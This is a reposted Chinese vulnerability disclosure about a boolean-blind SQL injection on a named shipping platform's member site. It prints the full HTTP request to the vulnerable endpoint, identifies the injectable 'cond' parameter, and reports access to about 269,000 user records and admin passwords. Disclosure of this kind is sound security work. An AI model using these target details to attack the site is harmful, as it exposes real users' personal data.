1. 计算机技术网首页
  2. web服务器教学教程
  3. 企业安全

百世旗下海淘转运平台另一处SQL注入(涉及近27W用户信息)企业安全分享!

企业安全 阅读 2

百世旗下海淘转运平台另一处SQL注入(涉及近27W用户信息)
这次看了下……貌似用户量变多了……
select count(*) from osShipUser;: '268703'

百世旗下海淘转运平台另一处SQL注入(涉及近27W用户信息)


这次看了下……貌似用户量变多了……
select count(*) from osShipUser;: '268703'

用户登录后,在可以任意新建一个订单,然后再查询可以进行BOOL型盲注

抓包:

POST /member/ashx/noticeList.ashx HTTP/1.1

Host: member.360hitao.com

Proxy-Connection: keep-alive

Content-Length: 60

Accept: */*

Origin: https://member.360hitao.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: https://member.360hitao.com/member/noticeList.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie:略去

CurrentPage=1&methods=Paging&cond=2%26%26%26%261%26%26%26%26

cond参数可以注入

百世旗下海淘转运平台另一处SQL注入(涉及近27W用户信息)
依旧可以得到管理员密码和用户的数据:

百世旗下海淘转运平台另一处SQL注入(涉及近27W用户信息)

百世旗下海淘转运平台另一处SQL注入(涉及近27W用户信息)

解决方案:

实在不行上waf吧,或者网站重新开发下……

另外真的会有小礼物吗?O.O

www.dengb.comtruehttps://www.dengb.com/qyaq/1085261.htmlTechArticle百世旗下海淘转运平台另一处SQL注入(涉及近27W用户信息) 这次看了下貌似用户量变多了 select count(*) from osShipUser;: 268703 用户登录后,在可以…

—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>

本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址:https://www.ctvol.com/webstt/esecurity/100386.html

(0)
0
上一篇 2020年4月26日
下一篇 2020年4月26日

精彩推荐